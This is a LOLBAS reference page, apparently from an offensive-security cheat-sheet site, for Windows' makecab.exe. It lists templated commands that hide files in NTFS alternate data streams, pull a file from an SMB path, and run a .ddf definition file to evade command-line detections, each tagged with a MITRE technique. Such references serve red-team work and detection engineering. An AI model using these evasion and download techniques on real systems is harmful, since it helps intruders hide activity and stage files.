🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Makecab.exe

Makecab.exe

Binary to package existing files into a cabinet (.cab) file

ADS

Hide data compressed into an alternate data stream

makecab {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:autoruns.cab

Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. — MITRE: T1564.004 — Privileges: User

Hide data compressed into an alternate data stream

makecab {PATH_SMB:.exe} {PATH_ABSOLUTE}:file.cab

Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. — MITRE: T1564.004 — Privileges: User

Download

Download file and compress into a cab file

makecab {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}

Download and compresses the target file and stores it in the target file. — MITRE: T1105 — Privileges: User

Execute

Bypass command-line based detections

makecab /F {PATH:.ddf}

Execute makecab commands as defined in the specified Diamond Definition File (.ddf); see resources for the format specification. — MITRE: T1036 — Privileges: User